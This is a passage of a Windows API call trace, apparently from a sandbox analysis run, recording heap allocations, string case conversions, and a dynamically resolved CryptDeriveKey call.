[0223.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0223.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0223.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0223.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0223.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb60 [0223.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0223.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbc0 [0223.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0223.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb78 [0223.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0223.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabaa0 [0223.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0223.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabce0 [0223.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0223.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb90 [0223.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0223.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba40 | out: hHeap=0x2af0000) returned 1 [0223.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba58 [0223.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0223.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0223.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0223.214] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0223.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0223.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaba70 [0223.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0223.214] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0223.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0223.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba40 [0223.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabab8 [0223.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0223.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabad0 [0223.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0223.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0223.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0223.215] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0223.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0223.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0223.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabad0 | out: hHeap=0x2af0000) returned 1 [0223.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0223.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba40 | out: hHeap=0x2af0000) returned 1 [0223.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0223.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0223.215] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0223.215] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0223.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0223.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc08 [0223.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbd8 [0223.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0223.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc68 [0223.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0223.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0223.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbd8 | out: hHeap=0x2af0000) returned 1 [0223.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc08 | out: hHeap=0x2af0000) returned 1 [0223.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0223.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0223.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0223.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0223.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabab8 [0223.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0223.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbd8 [0223.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0223.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcb0 [0223.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0223.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc20 [0223.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0223.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcc8 [0223.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0223.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0223.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0223.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc68 [0223.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0223.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0223.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabad0 [0223.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0223.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabae8 [0223.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0223.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba70 [0223.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0223.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc80 [0223.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0223.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb00 [0223.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0223.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc08 [0223.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0223.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba40 [0223.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb18 [0223.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0223.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb30 [0223.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0223.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0223.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0223.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba40 | out: hHeap=0x2af0000) returned 1 [0223.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0223.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0223.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb18 [0223.217] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb48 [0223.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0223.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0223.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc38 [0223.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb48 | out: hHeap=0x2af0000) returned 1 [0223.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0223.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0223.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb30 [0223.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0223.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba40 [0223.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0223.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0223.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb48 [0223.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba40 | out: hHeap=0x2af0000) returned 1 [0223.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0223.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb48 | out: hHeap=0x2af0000) returned 1 [0223.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0223.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0223.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc38 [0223.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0223.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0223.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb48 [0223.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0223.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0223.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb48 | out: hHeap=0x2af0000) returned 1 [0223.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0223.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0223.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcf8 [0223.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0223.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0223.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc38 [0223.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcf8 | out: hHeap=0x2af0000) returned 1 [0223.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0223.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0223.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0223.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0223.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcf8 [0223.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0223.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0223.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc38 [0223.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcf8 | out: hHeap=0x2af0000) returned 1 [0223.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0223.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0223.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0223.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0223.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0223.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0223.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcf8 [0223.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0223.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0223.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb30 [0223.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcf8 | out: hHeap=0x2af0000) returned 1 [0223.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0223.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0223.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0223.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb30 [0223.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0223.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0223.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf) returned 0x2aabc38 [0223.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabc38, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0223.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0223.220] GetProcAddress (hModule=0x76390000, lpProcName="CryptDeriveKey") returned 0x763c2c90 [0223.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0223.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0223.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7200 [0223.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0223.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0223.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0223.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0223.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0223.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0223.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0223.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0223.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0223.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0223.221] CryptDeriveKey (in: hProv=0xa7bef0, Algid=0x6601, hBaseData=0x9e2238, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1eb8) returned 1 [0223.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865b08 [0223.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0223.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0223.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcf8 [0223.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb30 [0223.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb48 [0223.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0223.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb48 | out: hHeap=0x2af0000) returned 1 [0223.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0223.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0223.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc38 [0223.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba40 [0223.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb30 [0223.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0223.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0223.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0223.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba40 | out: hHeap=0x2af0000) returned 1 [0223.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb48 [0223.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba40 [0223.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb30 [0223.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0223.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0223.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba40 | out: hHeap=0x2af0000) returned 1 [0223.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba40 [0223.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb30 [0223.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabf80 [0223.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0223.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabf80 | out: hHeap=0x2af0000) returned 1 [0223.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0223.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0223.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb30 [0223.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabf50 [0223.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabe00 [0223.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0223.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabe00 | out: hHeap=0x2af0000) returned 1 [0223.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0223.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabf50 | out: hHeap=0x2af0000) returned 1 [0223.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabf38 [0223.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabdd0 [0223.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabef0 [0223.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0223.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabef0 | out: hHeap=0x2af0000) returned 1 [0223.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0223.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabdd0 | out: hHeap=0x2af0000) returned 1 [0223.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0223.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0223.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0223.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0223.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0223.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 